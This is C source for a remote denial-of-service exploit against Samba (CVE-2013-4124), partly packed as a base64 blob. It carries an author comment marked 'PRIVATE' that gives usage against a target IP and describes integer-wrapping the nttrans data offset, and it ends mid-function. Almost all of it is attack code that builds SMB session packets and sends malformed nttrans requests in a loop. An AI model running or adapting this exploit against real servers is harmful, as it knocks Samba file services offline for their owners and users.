RmKCJzZXNzaW9uIHJlcXVlc3QgZ3JhbnRlZFxuIik7DQp9DQoN
CnZvaWQgbmVncHJvdF9yZXF1ZXN0KGludCBmZCkNCnsgc3RydW
N0IHZhcmlhYmxlX2RhdGFfaGVhZGVyIGRhdGE7DQogY2hhciBk
aWFsZWN0c1tdID0gIlx4MlBDIE5FVFdPUksgUFJPR1JBTSAxLj
BceDBceDJNSUNST1NPRlQgTkVUV09SS1MgMS4wM1x4MFx4Mk1J
Q1JPU09GVCBORVRXT1JLUyAzLjBceDBceDJMQU5NQU4xLjBceD
AiIFwNCiAiXHgyTE0xLjJYMDAyXHgwXHgyU2FtYmFceDBceDJO
VCBMQU5NQU4gMS4wXHgwXHgyTlQgTE0gMC4xMlx4MFx4MiIiRk
xBVExJTkUnUyBLV0FBRFdBQVIiOyANCiBjaGFyIHBhY2tldFtz
aXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZWFkZXIpICsgc2
l6ZW9mIChzdHJ1Y3Qgc21iX2Jhc2VfaGVhZGVyKSArIHNpemVv
ZiAoZGF0YSkgKyBzaXplb2YgKGRpYWxlY3RzKV07DQogaW50IG
RsZW4gPSBodG9ucyhzaXplb2YgKGRpYWxlY3RzKSk7DQoNCiBt
ZW1zZXQoJmRhdGEsICdcMCcsIHNpemVvZiAoZGF0YSkpOw0KIG
NvbnN0cnVjdF9uYnRfc2Vzc2lvbl9oZWFkZXIocGFja2V0LCBT
TUJfU0VTU0lPTiwgMCwgc2l6ZW9mIChwYWNrZXQpIC0gc2l6ZW
9mIChzdHJ1Y3QgbmJ0X3Nlc3Npb25faGVhZGVyKSk7DQogcGlk
ID0gZ2V0cGlkKCk7DQogY29uc3RydWN0X3NtYl9iYXNlX2hlYW
RlcihwYWNrZXQgKyBzaXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lv
bl9oZWFkZXIpLCBTTUJfTkVHUFJPVCwgOCwgMSwgMCwgcGlkLC
AwLCAxKTsNCg0KIG1lbWNweSgmZGF0YS5ieXRlY291bnQsICZk
bGVuLCBzaXplb2YgKHVpbnQxNikpOw0KDQogbWVtY3B5KHBhY2
tldCArIChzaXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZWFk
ZXIpICsgc2l6ZW9mIChzdHJ1Y3Qgc21iX2Jhc2VfaGVhZGVyKS
ksICZkYXRhLCBzaXplb2YgKGRhdGEpKTsNCiBtZW1jcHkocGFj
a2V0ICsgKHNpemVvZiAoc3RydWN0IG5idF9zZXNzaW9uX2hlYW
RlcikgKyBzaXplb2YgKHN0cnVjdCBzbWJfYmFzZV9oZWFkZXIp
ICsgc2l6ZW9mIChkYXRhKSksIA0KIGRpYWxlY3RzLCBzaXplb2
YgKGRpYWxlY3RzKSk7DQoNCiBpZiAod3JpdGUoZmQsIHBhY2tl
dCwgc2l6ZW9mIChwYWNrZXQpKSA9PSAtMSkNCiB7IGNsb3NlKG
ZkKTsNCiBmcHJpbnRmKHN0ZGVyciwgIndyaXRlKCkgZmFpbGVk
LCByZWFzb246ICclcycgKGNvZGUgJWkpXG4iLCBzdHJlcnJvci
hlcnJubyksIGVycm5vKTsgDQogZXhpdCgtZXJybm8pOw0KIH0N
Cn0NCg0Kdm9pZCBwcm9jZXNzX25lZ3Byb3RfcmVwbHkoaW50IG
ZkKQ0KeyBzdHJ1Y3QgbmJ0X3Nlc3Npb25faGVhZGVyICpuYnRf
aGRyOw0KIHN0cnVjdCBzbWJfYmFzZV9oZWFkZXIgKmJhc2VfaG
RyOw0KIHN0cnVjdCBuZWdwcm90X3JlcGx5X2hlYWRlciAqbnBf
cmVwbHlfaGRyOw0KIGNoYXIgcGFja2V0WzEwMjRdOw0KIGludC
BzaXplOw0KIHVpbnQxNiBwaWRfcmVwbHk7DQoNCiBuYnRfaGRy
ID0gKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZWFkZXIgKilwYWNrZX
Q7DQogYmFzZV9oZHIgPSAoc3RydWN0IHNtYl9iYXNlX2hlYWRl
ciAqKShwYWNrZXQgKyBzaXplb2YgKHN0cnVjdCBuYnRfc2Vzc2
lvbl9oZWFkZXIpKTsNCiBucF9yZXBseV9oZHIgPSAoc3RydWN0
IG5lZ3Byb3RfcmVwbHlfaGVhZGVyICopKHBhY2tldCArIChzaX
plb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZWFkZXIpICsgDQog
c2l6ZW9mIChzdHJ1Y3Qgc21iX2Jhc2VfaGVhZGVyKSkpOw0KDQ
ogaWYgKChzaXplID0gcmVhZChmZCwgcGFja2V0LCBzaXplb2Yg
KHBhY2tldCkpKSA9PSAtMSkNCiB7IGNsb3NlKGZkKTsNCiBmcH
JpbnRmKHN0ZGVyciwgInJlYWQoKSBmYWlsZWQsIHJlYXNvbjog
JyVzJyAoY29kZSAlaSlcbiIsIHN0cmVycm9yKGVycm5vKSwgZX
Jybm8pOyANCiBleGl0KC1lcnJubyk7DQogfQ0KDQogbWVtY3B5
KCZwaWRfcmVwbHksICZiYXNlX2hkci0+cGlkLCBzaXplb2YgKH
VpbnQxNikpOw0KIG1lbWNweSgmc2Vzc2lvbmlkLCAmbnBfcmVw
bHlfaGRyLT5zZXNzaW9uaWQsIHNpemVvZiAodWludDMyKSk7DQ
ogaWYgKGJhc2VfaGRyLT5jb21tYW5kICE9IFNNQl9ORUdQUk9U
IHx8IG5wX3JlcGx5X2hkci0+d29yZGNvdW50ICE9IDE3IHx8IH
BpZF9yZXBseSAhPSBwaWQpDQogeyBjbG9zZShmZCk7DQogZnBy
aW50ZihzdGRlcnIsICJwcm90b2NvbCBuZWdvdGlhdGlvbiBmYW
lsZWRcbiIpOw0KIGV4aXQoLTEpOw0KIH0NCg0KIHByaW50Zigi
cHJvdG9jb2wgbmVnb3RpYXRpb24gY29tcGxldGVcbiIpOw0KfQ
0KDQp2b2lkIHNlc3NzZXR1cHhfcmVxdWVzdChpbnQgZmQpDQp7
IHVpbnQ4IGRhdGFbXSA9ICJceDEyXHgwXHgwXHgwXHg1NVx4Nm
VceDY5XHg3OFx4MDBceDUzXHg2MVx4NmRceDYyXHg2MSI7DQog
Y2hhciBwYWNrZXRbc2l6ZW9mIChzdHJ1Y3QgbmJ0X3Nlc3Npb2
5faGVhZGVyKSArIHNpemVvZiAoc3RydWN0IHNtYl9iYXNlX2hl
YWRlcikgKyANCiBzaXplb2YgKHN0cnVjdCBzZXNzc2V0dXB4X3
JlcXVlc3RfaGVhZGVyKSArIHNpemVvZiAoZGF0YSldOw0KIGlu
dCBzaXplOw0KDQogY29uc3RydWN0X25idF9zZXNzaW9uX2hlYW
RlcihwYWNrZXQsIFNNQl9TRVNTSU9OLCAwLCBzaXplb2YgKHBh
Y2tldCkgLSBzaXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZW
FkZXIpKTsNCiBjb25zdHJ1Y3Rfc21iX2Jhc2VfaGVhZGVyKHBh
Y2tldCArIHNpemVvZiAoc3RydWN0IG5idF9zZXNzaW9uX2hlYW
RlciksIFNNQl9TRVNTU0VUVVBYLCA4LCAxLCAwLCBwaWQsIDAs
IDEpOw0KIGNvbnN0cnVjdF9zZXNzc2V0dXB4X2hlYWRlcihwYW
NrZXQgKyBzaXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZWFk
ZXIpICsgc2l6ZW9mIChzdHJ1Y3Qgc21iX2Jhc2VfaGVhZGVyKS
k7DQogbWVtY3B5KHBhY2tldCArIHNpemVvZiAoc3RydWN0IG5i
dF9zZXNzaW9uX2hlYWRlcikgKyBzaXplb2YgKHN0cnVjdCBzbW
JfYmFzZV9oZWFkZXIpICsgDQogc2l6ZW9mIChzdHJ1Y3Qgc2Vz
c3NldHVweF9yZXF1ZXN0X2hlYWRlciksICZkYXRhLCBzaXplb2
YgKGRhdGEpKTsNCg0KIGlmICgoc2l6ZSA9IHdyaXRlKGZkLCBw
YWNrZXQsIHNpemVvZiAocGFja2V0KSkpID09IC0xKQ0KIHsgY2
xvc2UoZmQpOw0KIGZwcmludGYoc3RkZXJyLCAid3JpdGUoKSBm
YWlsZWQsIHJlYXNvbjogJyVzJyAoY29kZSAlaSlcbiIsIHN0cm
Vycm9yKGVycm5vKSwgZXJybm8pOyANCiBleGl0KC1lcnJubyk7
DQogfQ0KIGlmIChzaXplICE9IHNpemVvZiAocGFja2V0KSkNCi
B7IGNsb3NlKGZkKTsNCiBmcHJpbnRmKHN0ZGVyciwgImNvdWxk
bid0IHdyaXRlIGVudGlyZSBwYWNrZXQsIGFib3J0aW5nIVxuIi
k7DQogZXhpdCgtMSk7DQogfQ0KfQ0KDQp2b2lkIHByb2Nlc3Nf
c2Vzc3NldHVweF9yZXBseShpbnQgZmQpDQp7IHN0cnVjdCBuYn
Rfc2Vzc2lvbl9oZWFkZXIgKm5idF9oZHI7DQogc3RydWN0IHNt
Yl9iYXNlX2hlYWRlciAqYmFzZV9oZHI7DQogc3RydWN0IHNlc3
NzZXR1cHhfcmVwbHlfaGVhZGVyICpzeF9oZHI7DQogY2hhciBw
YWNrZXRbMTAyNF07DQogaW50IHNpemUsIGxlbjsNCg0KIGlmIC
goc2l6ZSA9IHJlYWQoZmQsIHBhY2tldCwgc2l6ZW9mIChwYWNr
ZXQpKSkgPT0gLTEpDQogeyBjbG9zZShmZCk7DQogZnByaW50Zi
hzdGRlcnIsICJyZWFkKCkgZmFpbGVkLCByZWFzb246ICclcycg
KGNvZGUgJWkpXG4iLCBzdHJlcnJvcihlcnJubyksIGVycm5vKT
sgDQogZXhpdCgtZXJybm8pOw0KIH0NCg0KIG5idF9oZHIgPSAo
c3RydWN0IG5idF9zZXNzaW9uX2hlYWRlciAqKXBhY2tldDsNCi
BiYXNlX2hkciA9IChzdHJ1Y3Qgc21iX2Jhc2VfaGVhZGVyICop
KHBhY2tldCArIHNpemVvZiAoc3RydWN0IG5idF9zZXNzaW9uX2
hlYWRlcikpOw0KIHN4X2hkciA9IChzdHJ1Y3Qgc2Vzc3NldHVw
eF9yZXBseV9oZWFkZXIgKikocGFja2V0ICsgc2l6ZW9mIChzdH
J1Y3QgbmJ0X3Nlc3Npb25faGVhZGVyKSArIHNpemVvZiAoc3Ry
dWN0IHNtYl9iYXNlX2hlYWRlcikpOw0KDQogbWVtY3B5KCZsZW
4sICZuYnRfaGRyLT5sZW4sIHNpemVvZiAodWludDE2KSk7DQog
bWVtY3B5KCZ1aWQsICZiYXNlX2hkci0+dWlkLCBzaXplb2YgKH
VpbnQxNikpOw0KDQogaWYgKHN4X2hkci0+eGNvbW1hbmQgIT0g
MHhmZiAmJiBzeF9oZHItPndvcmRjb3VudCAhPSAzKQ0KIHsgY2
xvc2UoZmQpOw0KIGZwcmludGYoc3RkZXJyLCAic2Vzc2lvbiBz
ZXR1cCBmYWlsZWRcbiIpOw0KIGV4aXQoLTEpOw0KIH0NCg0KIH
ByaW50Zigic2Vzc2lvbiBzZXR1cCBjb21wbGV0ZSwgZ290IGFz
c2lnbmVkIHVpZCAlaVxuIiwgdWlkKTsNCn0NCg0Kdm9pZCB0Y2
9ueF9yZXF1ZXN0KGludCBmZCkNCnsgDQogY2hhciAqcGFja2V0
Ow0KIGludCBzaXplLCBwa3RzaXplID0gc2l6ZW9mIChzdHJ1Y3
QgbmJ0X3Nlc3Npb25faGVhZGVyKSArIHNpemVvZiAoc3RydWN0
IHNtYl9iYXNlX2hlYWRlcikgKw0KIHNpemVvZiAoc3RydWN0IH
Rjb254X3JlcXVlc3RfaGVhZGVyKSArIHN0cmxlbih0Y29ueF9z
ZXJ2ZXJuYW1lKSArIDE1Ow0KDQogaWYgKChwYWNrZXQgPSBtYW
xsb2MocGt0c2l6ZSkpID09IE5VTEwpDQogeyBjbG9zZShmZCk7
DQogZnByaW50ZihzdGRlcnIsICJtYWxsb2MoKSBmYWlsZWQsIG
Fib3J0aW5nIVxuIik7DQogZXhpdCgtMSk7DQogfQ0KDQogY29u
c3RydWN0X25idF9zZXNzaW9uX2hlYWRlcihwYWNrZXQsIFNNQl
9TRVNTSU9OLCAwLCBwa3RzaXplIC0gc2l6ZW9mIChzdHJ1Y3Qg
bmJ0X3Nlc3Npb25faGVhZGVyKSk7DQogY29uc3RydWN0X3NtYl
9iYXNlX2hlYWRlcihwYWNrZXQgKyBzaXplb2YgKHN0cnVjdCBu
YnRfc2Vzc2lvbl9oZWFkZXIpLCBTTUJfVENPTlgsIDgsIDEsID
AsIHBpZCwgdWlkLCAxKTsNCiBjb25zdHJ1Y3RfdGNvbnhfaGVh
ZGVyKHBhY2tldCArIHNpemVvZiAoc3RydWN0IG5idF9zZXNzaW
9uX2hlYWRlcikgKyBzaXplb2YgKHN0cnVjdCBzbWJfYmFzZV9o
ZWFkZXIpKTsNCg0KIGlmICgoc2l6ZSA9IHdyaXRlKGZkLCBwYW
NrZXQsIHBrdHNpemUpKSA9PSAtMSkNCiB7IGNsb3NlKGZkKTsN
CiBmcHJpbnRmKHN0ZGVyciwgIndyaXRlKCkgZmFpbGVkLCByZW
Fzb246ICclcycgKGNvZGUgJWkpXG4iLCBzdHJlcnJvcihlcnJu
byksIGVycm5vKTsgDQogZXhpdCgtZXJybm8pOw0KIH0NCg0KIG
ZyZWUocGFja2V0KTsNCg0KIGlmIChzaXplICE9IHBrdHNpemUp
DQogeyBjbG9zZShmZCk7DQogZnByaW50ZihzdGRlcnIsICJjb3
VsZG4ndCB3cml0ZSBlbnRpcmUgcGFja2V0LCBhYm9ydGluZyFc
biIpOw0KIGV4aXQoLTEpOw0KIH0gDQp9DQoNCnZvaWQgcHJvY2
Vzc190Y29ueF9yZXBseShpbnQgZmQpDQp7IHN0cnVjdCBuYnRf
c2Vzc2lvbl9oZWFkZXIgKm5idF9oZHI7DQogc3RydWN0IHNtYl
9iYXNlX2hlYWRlciAqYmFzZV9oZHI7DQogc3RydWN0IHRjb254
X3JlcGx5X2hlYWRlciAqdHhfaGRyOw0KIGNoYXIgcGFja2V0Wz
EwMjRdOw0KIGludCBzaXplLCBieXRlY291bnQ7DQogDQogaWYg
KChzaXplID0gcmVhZChmZCwgcGFja2V0LCBzaXplb2YgKHBhY2
tldCkpKSA9PSAtMSkNCiB7IGNsb3NlKGZkKTsNCiBmcHJpbnRm
KHN0ZGVyciwgInJlYWQoKSBmYWlsZWQsIHJlYXNvbjogJyVzJy
AoY29kZSAlaSlcbiIsIHN0cmVycm9yKGVycm5vKSwgZXJybm8p
Ow0KIGV4aXQoLWVycm5vKTsNCiB9DQoNCiBuYnRfaGRyID0gKH
N0cnVjdCBuYnRfc2Vzc2lvbl9oZWFkZXIgKilwYWNrZXQ7DQog
YmFzZV9oZHIgPSAoc3RydWN0IHNtYl9iYXNlX2hlYWRlciAqKS
hwYWNrZXQgKyBzaXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9o
ZWFkZXIpKTsNCiB0eF9oZHIgPSAoc3RydWN0IHRjb254X3JlcG
x5X2hlYWRlciAqKShwYWNrZXQgKyBzaXplb2YgKHN0cnVjdCBu
YnRfc2Vzc2lvbl9oZWFkZXIpICsgc2l6ZW9mIChzdHJ1Y3Qgc2
1iX2Jhc2VfaGVhZGVyKSk7DQoNCiBtZW1jcHkoJnRpZCwgJmJh
c2VfaGRyLT50aWQsIHNpemVvZiAodWludDE2KSk7DQogbWVtY3
B5KCZieXRlY291bnQsICZ0eF9oZHItPmJ5dGVjb3VudCwgc2l6
ZW9mICh1aW50MTYpKTsNCg0KIHByaW50ZigidHJlZSBjb25uZW
N0IGNvbXBsZXRlLCBnb3QgYXNzaWduZWQgdGlkICVpXG4iLCB0
aWQpOw0KfQ0KDQp2b2lkIG50dHJhbnNfcmVxdWVzdChpbnQgZm
QsIHVuc2lnbmVkIGludCBvZmZzZXRfd3JhcCkgeyANCgkvLyBw
YWNrZXQgPSBuYnQgc2Vzc2lvbiBoZWFkZXIgKyBzbWIgYmFzZS
BoZWFkZXIgKyBudHRyYW5zIGhlYWRlciENCgljaGFyIHBhY2tl
dFtzaXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZWFkZXIpIC
sgDQoJCQkJc2l6ZW9mIChzdHJ1Y3Qgc21iX2Jhc2VfaGVhZGVy
KSArIA0KCQkJCXNpemVvZiAoc3RydWN0IG50dHJhbnNfcmVxdW
VzdF9oZWFkZXIpXTsNCglzdHJ1Y3QgbnR0cmFuc19yZXF1ZXN0
X2hlYWRlciBudHRyYW5zX2hkcjsJLy8gbnR0cmFucyBoZWFkZX
IhDQoJaW50IHNpemU9MDsNCglpbnQgZnVuY3Rpb24gPSBTTUJf
TlRUUkFOU0NSRUFURTsJLy8gTlRUUkFOU0NSRUFURSENCglpbn
QgdG90YWxwYXJhbWNvdW50ID0gVE9UQUxDT1VOVDsNCglpbnQg
dG90YWxkYXRhY291bnQgPSAwOw0KCXVpbnQ4IHNldHVwY291bn
QgPSAwOw0KDQoJbWVtc2V0KCZudHRyYW5zX2hkciwgMCwgc2l6
ZW9mIG50dHJhbnNfaGRyKTsNCg0KCS8vIGNvbnN0cnVjdCBuYn
Qgc2Vzc2lvbiBoZWFkZXINCgljb25zdHJ1Y3RfbmJ0X3Nlc3Np
b25faGVhZGVyKHBhY2tldCwgU01CX1NFU1NJT04sIDAsIHNpem
VvZiAocGFja2V0KSAtIHNpemVvZiAoc3RydWN0IG5idF9zZXNz
aW9uX2hlYWRlcikpOw0KCS8vIGNvbnN0cnVjdCBzbWIgYmFzZS
BoZWFkZXINCgljb25zdHJ1Y3Rfc21iX2Jhc2VfaGVhZGVyKHBh
Y2tldCArIHNpemVvZiAoc3RydWN0IG5idF9zZXNzaW9uX2hlYW
RlciksIFNNQl9OVFRSQU5TLCA4LCAxLCB0aWQsIHBpZCwgdWlk
LCAxKTsNCg0KCS8vIGNvbnN0cnVjdCBudHRyYW5zIGhlYWRlcg
0KCXNwcmludGYobnR0cmFuc19oZHIucGFyYW1vZmZzZXQsICIl
cCIsIG9mZnNldF93cmFwKTsNCg0KCS8qKioqKioqKioqDQoJIC
ogWFhYIGRhdGEgb2Zmc2V0IDB4ZmZmZmZmZmYgdG8gMHhmMTAw
MDAwMCB0byBpbnRlZ2VyIHdyYXANCgkgKgkJdGhlIG9mZnNldC
BleHBsb2l0cyB0aGUgc2VjdXJpdHkgYnVnIG9mIENWRS0yMDEz
LTQxMjQNCgkgKiAgICAgIHNhbWJhIHJlbW90ZSBkb3MhDQogIC
AgICovDQoJc3ByaW50ZihudHRyYW5zX2hkci5kYXRhb2Zmc2V0
LCAiJXAiLCBvZmZzZXRfd3JhcCk7DQoNCgludHRyYW5zX2hkci
53b3JkY291bnQgPSAxOSArIHNldHVwY291bnQ7DQoJbWVtY3B5
KCZudHRyYW5zX2hkci5mdW5jdGlvbiwgJmZ1bmN0aW9uLCBzaX
plb2YgKHVpbnQxNikpOw0KCW1lbWNweSgmbnR0cmFuc19oZHIu
dG90YWxwYXJhbWNvdW50LCAmdG90YWxwYXJhbWNvdW50LCBzaX
plb2YgKHVpbnQzMikpOw0KCW1lbWNweSgmbnR0cmFuc19oZHIu
dG90YWxkYXRhY291bnQsICZ0b3RhbGRhdGFjb3VudCwgc2l6ZW
9mICh1aW50MzIpKTsNCgltZW1jcHkocGFja2V0ICsgc2l6ZW9m
IChzdHJ1Y3QgbmJ0X3Nlc3Npb25faGVhZGVyKSArIHNpemVvZi
Aoc3RydWN0IHNtYl9iYXNlX2hlYWRlciksICZudHRyYW5zX2hk
ciwgc2l6ZW9mIG50dHJhbnNfaGRyKTsNCg0KCS8vIHNlbmQgc2
FtYmEgcGFja2V0IQ0KCXNpemUgPSB3cml0ZShmZCwgcGFja2V0
LCBzaXplb2YgKHBhY2tldCkpOw0KCWNsb3NlKGZkKTsNCg0KfQ
0KDQpzdGF0aWMgY2hhciBiYW5uZXJbXT17DQoiICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgX19fICAgIF9fXy
AgICAgICAgICAgICAgXG4iIFwNCiIgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgIC8gXyBcXCAgLyBfIFxcICAgIC
AgICAgICBcbiIgXA0KIiAgICAgICAgICAgICAgICAgICAgICAg
ICAgICBfXyAgX198IChfKSB8fCB8IHwgfCAgX19fICAgICAgIF
xuIiBcDQoiICAgICAgICAgICAgICAgICAgICAgICAgICAgIFxc
IFxcLyAvIFxcX18uIHx8IHwgfCB8IC8gX198ICAgXG4iIFwNCi
IgICAgICAgICAgICAgICAgICAgICAgICAgICAgID4gIDwgICAg
LyAvIHwgfF98IHx8IChfXyAgICAgICBcbiIgXA0KIiAgICAgIC
AgICAgICAgICAgICAgICAgICAgICAvXy9cXF9cXCAgL18vICAg
XFxfX18vICBcXF9fX3wgIFxuIiBcDQp9Ow0KDQppbnQgbWFpbi
hpbnQgYXJnYywgY2hhciAqYXJndltdKSB7DQoJaW50IGZkOw0K
CXN0cnVjdCBzb2NrYWRkcl9pbiBzX2luOw0KCWNoYXIgdGFyZ2
V0X2lwWzE2XTsNCgljaGFyIHNlcnZlcl9uYW1lWzMyXTsNCglp
bnQgc21iX3BvcnQ9MTM5Ow0KICAgIHVuc2lnbmVkIGludCBvZm
ZzZXRfd3JhcD0weDAwMDAwMDAwOw0KDQogICAgcHJpbnRmKCIl
c1xuXG5zYW1iYSBudHRyYW5zIHJlcGx5IGV4cGxvaXRcblxuIi
wgYmFubmVyKTsNCg0KCWlmKGFyZ2MgPCAyKXsNCgkJZnByaW50
ZihzdGRlcnIsICJzYW1iYSBudHRyYW5zIHJlcGx5IGV4cGxvaX
QgVXNhZ2U6XG5cbi4vc2FtYmFfZXhwbG9pdCBbdGFyZ2V0IGlw
IGFkZHJdIDxzZXJ2ZXIgbmFtZT5cblxuIg0KCQkJCQkJImV4KS
AuL3NhbWJhX2V4cGxvaXQgMTAuMC4xLjE2XG4iDQoJCQkJCQki
ZXgpIC4vc2FtYmFfZXhwbG9pdCAxMC4wLjEuMTYgTVlTQU1CQV
xuXG4iKTsNCg0KCQlleGl0KC0xKTsNCgl9DQoNCglzdHJuY3B5
KHRhcmdldF9pcCwgYXJndlsxXSwgMTYpOw0KDQoJaWYoYXJnYz
09Myl7DQoJCW1lbXNldChzZXJ2ZXJfbmFtZSwgMCwgc2l6ZW9m
IHNlcnZlcl9uYW1lKTsNCgkJc3RybmNweShzZXJ2ZXJfbmFtZS
wgYXJndlsyXSwgc2l6ZW9mKHNlcnZlcl9uYW1lKS0xKTsNCgl9
IGVsc2V7DQoJCXNwcmludGYoc2VydmVyX25hbWUsICJTQU1CQS
IpOw0KCX0NCg0KCXByaW50ZigiWypdIFNFUlZFUiBOQU1FOiAl
c1xuIiwgc2VydmVyX25hbWUpOw0KDQogICAgbWVtc2V0KCZzX2
luLCAwLCBzaXplb2YgKHNfaW4pKTsNCiAgICBzX2luLnNpbl9m
YW1pbHkgPSBBRl9JTkVUOw0KICAgIHNfaW4uc2luX3BvcnQgPS
BodG9ucyhzbWJfcG9ydCk7CS8vIHNhbWJhIHBvcnQ9MTM5L3Rj
cA0KICAgIHNfaW4uc2luX2FkZHIuc19hZGRyID0gaW5ldF9hZG
RyKHRhcmdldF9pcCk7DQoNCiAgICBmZCA9IHNvY2tldChBRl9J
TkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApOw0KICAgIG
Nvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmc19pbiwg
c2l6ZW9mIChzX2luKSk7DQoNCgkvLyBuYnQobmV0YmlvcyBvdm
VyIHRjcGlwLCBuYnRzdGF0KSBzZXNzaW9uIHJlcXVlc3QNCglu
YnRfc2Vzc2lvbl9yZXF1ZXN0KGZkLCAiQk9TU0EiLCBzZXJ2ZX
JfbmFtZSk7CS8vIGFkanVzdCBjb21wdXRlciBuYW1lcyhjbGll
bnRuYW1lLCBzZXJ2ZXJuYW1lKQ0KICAgIHByb2Nlc3NfbmJ0X3
Nlc3Npb25fcmVwbHkoZmQpOw0KDQoJLy8gcHJvdG9jb2wgbmVn
b3RpYXRpb24NCiAgICBuZWdwcm90X3JlcXVlc3QoZmQpOw0KIC
AgIHByb2Nlc3NfbmVncHJvdF9yZXBseShmZCk7DQogDQogICAg
Ly8gc2Vzc2lvbiBzZXR1cA0KICAgIHNlc3NzZXR1cHhfcmVxdW
VzdChmZCk7CS8vIHNldHVwIHJlcXVlc3QNCiAgICBwcm9jZXNz
X3Nlc3NzZXR1cHhfcmVwbHkoZmQpOwkvLyBzZXR1cCByZXBseQ
0KDQogICAgLy8gdHJlZSBjb25uZWN0aW9uIHNldHVwDQogICAg
dGNvbnhfcmVxdWVzdChmZCk7DQogICAgcHJvY2Vzc190Y29ueF
9yZXBseShmZCk7DQoNCgkvLyBleHBsb2l0IQ0KCXByaW50Zigi
WypdIG50dHJhbnMgcmVwbHkgZXhwbG9pdCFcbiIpOw0KDQoJLy
8gMHhmZmZmZmZmZiB+IDB4ZjEwMDAwMDAwMCB0byBpbnRlZ2Vy
IHdyYXANCglmb3Iob2Zmc2V0X3dyYXA9MHhmZmZmZmZmZjsgb2
Zmc2V0X3dyYXAgPj0gMHhmMTAwMDAwMDsgLS1vZmZzZXRfd3Jh
cCl7DQoJCXByaW50ZigiWy1dIG9mZnNldCB0byB3cmFwIHVwOi
AlcFxuIiwgb2Zmc2V0X3dyYXApOw0KCQludHRyYW5zX3JlcXVl
c3QoZmQsIG9mZnNldF93cmFwKTsNCgl9DQoNCgljbG9zZShmZC
k7DQoNCglyZXR1cm4gMDsNCn0=
end
EOF
/*
!!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!!
CVE-2013-4124 samba dos exploit
----
[x90c@ubuntu samba_dos]$ ./samba_nttrans_exploit
___ ___
/ _ \ / _ \
__ __| (_) || | | | ___
\ \/ / \__. || | | | / __|
> < / / | |_| || (__
/_/\_\ /_/ \___/ \___|
samba nttrans reply exploit
samba nttrans reply exploit Usage:
./samba_exploit [target ip addr] <server name>
ex) ./samba_exploit 10.0.1.16
ex) ./samba_exploit 10.0.1.16 MYSAMBA
[x90c@ubuntu samba_dos]$
----
* ... Description ...:
I didn't test for the exploit yet, I
copied another samba nttrans exploit
in 2003 that http://www.securiteam.co
m/exploits/5TP0M2AAKS.html. 1) the vul
nerable data offset is automated from
0xffffffff to 0xf1000000 and can pass
second argument for server name to make
nbt session If pass target ip addr
and server name to this exploit the
samba will be dos!
the exploit send malformed nttrans
smb packet with large value of data
offset and param offset 2) they are all
of offset of nttrans struct to cause
integer wrap in the vulnerable function
of read_nttrns_ea_list
It should be works because 1) 2)
- exploit process:
(1) smb negotiations
(2) malformed smb nttrans packet within
offset 0xffffffff ~ 0xf1000000 to
integer wrap sent!
(3) ...... samba dos!
I left an article that analyzed it
!!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!!
x90c
*/
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <ctype.h>
#include <signal.h>
typedef unsigned char uint8;
typedef unsigned short uint16;
typedef unsigned long uint32;
struct variable_data_header
{ uint8 wordcount, bytecount[2];
};
struct nbt_session_header
{ uint8 type, flags, len[2];
};
struct smb_base_header
{ uint8 protocol[4], command, errorclass, reserved, errorcode[2];
uint8 flags;
uint8 flags2[2], reserved2[12], tid[2], pid[2], uid[2], mid[2];
};
struct negprot_reply_header
{ uint8 wordcount;
uint8 dialectindex[2];
uint8 securitymode;
uint16 maxmpxcount, maxvccount;
uint32 maxbufsize, maxrawsize, sessionid, capabilities, timelow, timehigh;
uint16 timezone;
uint8 keylen;
uint16 bytecount;
};
struct sesssetupx_request_header
{ uint8 wordcount, command, reserved;
uint8 offset[2], maxbufsize[2], maxmpxcount[2], vcnumber[2];
uint8 sessionid[4];
uint8 ipasswdlen[2], passwdlen[2];
uint8 reserved2[4], capabilities[4];
};
struct sesssetupx_reply_header
{ uint8 wordcount, xcommand, xreserved, xoffset[2], action[2], bytecount[2];
};
struct tconx_request_header
{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2],
bytecount[2];
};
struct tconx_reply_header
{ uint8 wordcount, xcommand, xreserved, xoffset[2], supportbits[2],
bytecount[2];
};
struct nttrans_request_header
{
uint8 wordcount;
uint8 maxsetupcount;
uint8 flags[2];
uint8 totalparamcount[4];
uint8 totaldatacount[4];
uint8 maxparamcount[4];
uint8 maxdatacount[4];
uint8 paramcount[4];
uint8 paramoffset[4]; // offset!
uint8 datacount[4];
uint8 dataoffset[4]; // XXX the data offset vulnerable!
uint8 setupcount; // nttrans struct doesn't have
other offset
uint8 function[2]; // field without them
uint8 bytecount[2];
};
#define SMB_NEGPROT 0x72
#define SMB_SESSSETUPX 0x73
#define SMB_TCONX 0x75
#define SMB_TRANS2 0x32
#define SMB_NTTRANS 0xA0
#define SMB_NTTRANSCREATE 0x01
#define SMB_TRANS2OPEN 0x00
#define SMB_SESSIONREQ 0x81
#define SMB_SESSION 0x00
uint32 sessionid, PARAMBASE = 0x81c0000;
char *tconx_servername;
int tid, pid, uid;
#define STACKBOTTOM 0xbfffffff
#define STACKBASE 0xbfffd000
#define TOTALCOUNT ((int)(STACKBOTTOM - STACKBASE))
char *netbios_encode_name(char *name, int type)
{ char plainname[16], c, *encoded, *ptr;
int i, len = strlen(name);
if ((encoded = malloc(34)) == NULL)
{ fprintf(stderr, "malloc() failed\n");
exit(-1);
}
ptr = encoded;
strncpy(plainname, name, 15);
*ptr++ = 0x20;
for (i = 0; i < 16; i++)
{ if (i == 15) c = type;
else
